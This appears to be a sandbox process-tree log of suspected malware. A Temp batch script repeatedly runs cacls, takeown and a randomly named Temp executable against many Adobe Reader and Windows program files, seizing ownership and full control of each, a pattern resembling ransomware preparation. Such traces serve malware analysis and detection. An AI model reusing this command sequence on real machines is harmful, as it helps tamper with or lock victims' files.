C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can129.hsp" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can129.hsp" -nobanner4⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "eula.ini" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "eula.ini" -nobanner4⤵PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""2⤵PID:1768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wab.exe" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wab.exe" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "main.css" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "main.css" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "review_shared.gif" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵
- Modifies file permissions
PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:1564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can03.ths" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can03.ths" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
